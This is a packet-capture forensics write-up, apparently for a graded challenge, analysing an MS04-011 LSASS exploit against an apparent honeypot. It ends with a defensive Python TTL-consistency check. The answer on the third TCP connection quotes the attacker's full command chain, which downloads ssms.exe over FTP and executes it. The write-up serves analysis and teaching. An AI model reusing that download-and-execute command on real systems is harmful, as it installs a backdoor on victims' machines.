SMB sends along some OS information when it's setting up, so if you look at packet 16 in the SMB header you can see Windows 2000.

On packet 33 you can see a big list of 1's and Wireshark reporting a "long frame". If you follow the TCP streams you'll also note that this is the end of TCP stream 1. If we take a look at what's going on we see that the attacker is sending DsRoleUpgradeDownlevelServer and following it with a buffer overflow. With some quick searching I found that this is exploit MS04-011, which exploits a vulnerable LSASS function aka.

Can you sketch an overview of the general actions performed by the attacker? (6pts)

TCP Connection 1 – The attacker initiates and closes a TCP connection with the victim.

TCP Connection 2 – An SMB connection is established; the attacker exploits LSASS with a buffer overflow.

TCP Connection 3 – The following command is run: `echo open 0.0.0.0 8884 > o&echo user 1 1 > o &echo get ssms.exe > o &echo quit > o &ftp -n -s:o &del /F /Q o &ssms.exe` (the &'s indicate line breaks).

TCP Connection 4 – A user logs in via an FTP backdoor and requests a binary to be downloaded.

TCP Connection 5 – The binary is downloaded to the victim machine.

What specific vulnerability was attacked? (2pts)

MS04-011, the LSASS DsRoleUpgradeDownlevelServer function.

Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)

In an IP header, different operating systems will provide different time-to-live values. I think it's a honeypot because at a quick glance the TTL values don't match a Windows machine: this machine said it was Windows 2000 in the SMB header, but uses a Linux TTL value of 64.

Was there malware involved? What's the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)

By carving the binary out of the pcap and obtaining a SHA1 hash of the file, VirusTotal reports it as being titled smss.exe with a variety of backdoor names.

Do you think this is a manual or an automated attack? Why? (2pts)

Automated: this happened in 16 seconds. I highly doubt an attacker would have been able to manually scan, exploit, enter 7 commands, and download and execute a binary in that time.
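As an added example (not part of the original write-up), here is the honeypot check from the TTL answer above written as a small script: it compares the OS a host announces in its SMB `Native OS` string with the OS family implied by the TTLs in the packets it sends, and also computes the attack duration from first to last packet. The packet summaries, IP addresses, timestamps and the `Native OS` string are constructed for the example, not taken from the challenge pcap.

```python
"""Compare the OS claimed over SMB with the OS family implied by observed IP TTLs.
Packet summaries below are constructed sample data, not parsed from a pcap."""

# Common default initial TTLs. These are defaults only: an admin can change them,
# so a mismatch is an indicator worth following up, not proof of a honeypot.
INITIAL_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "BSD/network device"}


def infer_initial_ttl(observed_ttl: int) -> int:
    """An observed TTL is the initial value minus hops; round up to the nearest default."""
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return initial
    raise ValueError(f"TTL {observed_ttl} is out of range")


def os_family_from_smb(native_os: str) -> str:
    """Map the SMB Session Setup 'Native OS' string to one of the TTL families."""
    return "Windows" if native_os.lower().startswith("windows") else "Linux/Unix"


def ttl_consistency(packets, host_ip: str, native_os: str) -> dict:
    """Flag a host whose SMB-claimed OS does not match the OS family its TTLs imply."""
    observed = {p["ttl"] for p in packets if p["src"] == host_ip}
    implied = {INITIAL_TTLS[infer_initial_ttl(t)] for t in observed}
    claimed = os_family_from_smb(native_os)
    return {"claimed": claimed, "implied": implied,
            "observed_ttls": observed, "mismatch": claimed not in implied}


def attack_duration(packets, attacker_ip: str) -> float:
    """Seconds between the first and last packet involving the attacker."""
    times = [p["ts"] for p in packets if attacker_ip in (p["src"], p["dst"])]
    return max(times) - min(times)


# Constructed sample: the "victim" 10.0.0.5 claims Windows 2000 over SMB but emits TTL 64,
# while the remote attacker 192.0.2.9 arrives with TTL 113 (128 minus 15 hops).
SAMPLE = [
    {"ts": 0.0, "src": "192.0.2.9", "dst": "10.0.0.5", "ttl": 113},
    {"ts": 0.1, "src": "10.0.0.5", "dst": "192.0.2.9", "ttl": 64},
    {"ts": 16.0, "src": "10.0.0.5", "dst": "192.0.2.9", "ttl": 64},
]

if __name__ == "__main__":
    print(ttl_consistency(SAMPLE, "10.0.0.5", "Windows 2000 2195"))
    print("attack duration:", attack_duration(SAMPLE, "192.0.2.9"), "s")
```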